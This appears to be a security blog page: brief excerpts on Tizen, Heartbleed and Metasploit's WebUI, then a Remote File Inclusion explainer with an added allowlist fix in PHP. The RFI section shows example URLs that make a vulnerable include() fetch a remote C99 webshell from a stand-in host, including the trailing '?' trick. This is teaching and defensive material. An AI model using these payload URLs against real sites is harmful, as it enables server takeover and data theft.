Tizen - The OS of Everything

Tizen is the open-source operating system for all device areas. Tizen is an open and flexible operating system built from the ground up to address the needs of all stakeholders of the mobile and connected device ecosystem, including device manufacturers, mobile operators, application developers and independent software vendors (ISVs). Tizen...

Sneak Peek – The Heartbleed Bug!!

The Heartbleed Bug is a critical vulnerability in the mainstream OpenSSL cryptographic programming library. It permits stealing data such as passwords and credit card numbers that is protected, under ordinary conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS gives security and...

Basic PenTesting using Metasploit WebUI

PenTesting:-

Many times we have to find weaknesses in networked systems that arise because critical patches were not applied. In such cases we can use penetration testing tools to find these vulnerabilities quickly. Enter Metasploit.

Metasploit is a penetration testing framework that automates a wide array of penetration testing tasks. Metasploit also has an easy-to-use web user interface that helps beginners use a large percentage of its potential.

Metasploit's WebUI login panel looks like the following.

After we log in using our credentials, we get the following screen, where we can create new projects.

Remote File Inclusion

What is RFI:-

RFI stands for remote file inclusion. It is an attack that executes a malicious script on a vulnerable server, where the script itself is hosted on another web site on the internet.

RFI Theory:-

Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this:

include($page . '.php');

This line of PHP code is then used in URLs like the following example:

http://www.vulnerable.website.com/index.php?page=archive

Because the $page variable is not specifically defined by the script and takes its value from the URL, an attacker can insert the location of a malicious file into the URL and execute it on the target server, as in this example:

http://www.vulnerable.website.com/index.php?page=http://www.malicious.code.com/C99.php?

The include() function above instructs the server to retrieve C99.php from the remote server and run its code. This is possible because PHP allows the user to load both remote and local content with the same functions. The code sample above does not perform any checks on the content of the $page variable; it blindly passes it to the function. Because the original piece of code appended .php to the file, it would try to fetch the following URL:

http://www.malicious.code.com/C99.php.php

As the attackers cannot know what the original code might append, they put a question mark at the end of the URL. This makes the script fetch the intended file, with the appended string as a parameter (which is ignored by the attacker’s script):

http://www.malicious.code.com/C99.php?.php

This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Scripts that send spam are also very common. Potentially, the attacker could even use the webshell to gain administrator-level, or root, access on the server.
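
The fix for the include() line above, as an added example that is not part of the original post: the page parameter is matched against a fixed allowlist before any path is built, so URL-shaped values never reach include(). The page names, the pages directory and the resolve_page() function are assumptions made for illustration.

```php
<?php
// Added example, not code from the original post.
// Assumed layout: includable pages live in ./pages next to this script.
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'archive', 'contact']; // assumed page names

// Vulnerable form quoted in the post, kept commented out for comparison:
//   include($page . '.php');

/**
 * Map the ?page= request value to a local file path, or throw.
 * Only an exact, strict match against ALLOWED_PAGES is accepted, so a
 * value containing a scheme, host, slash or trailing "?" is rejected
 * before any string concatenation happens.
 */
function resolve_page($requested): string
{
    if ($requested === null) {
        return PAGE_DIR . '/home.php';   // no parameter: default page
    }
    if (!is_string($requested) || !in_array($requested, ALLOWED_PAGES, true)) {
        throw new InvalidArgumentException('page not in allowlist');
    }
    return PAGE_DIR . '/' . $requested . '.php';
}

// Constructed sample inputs, including the URL shape quoted in the post.
$samples = [
    null,
    'archive',
    'http://www.malicious.code.com/C99.php?',
    'unknown',
    ['archive'],   // ?page[]=archive arrives as an array, not a string
];

foreach ($samples as $value) {
    try {
        echo 'ALLOW  ', resolve_page($value), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'REJECT ', json_encode($value), PHP_EOL;
    }
}

// In the front controller the call site would be:
//   include resolve_page($_GET['page'] ?? null);
```

Keeping allow_url_include disabled in php.ini (its default) is a second layer: with it off, include() refuses http:// and ftp:// URLs even if an unchecked value reaches it.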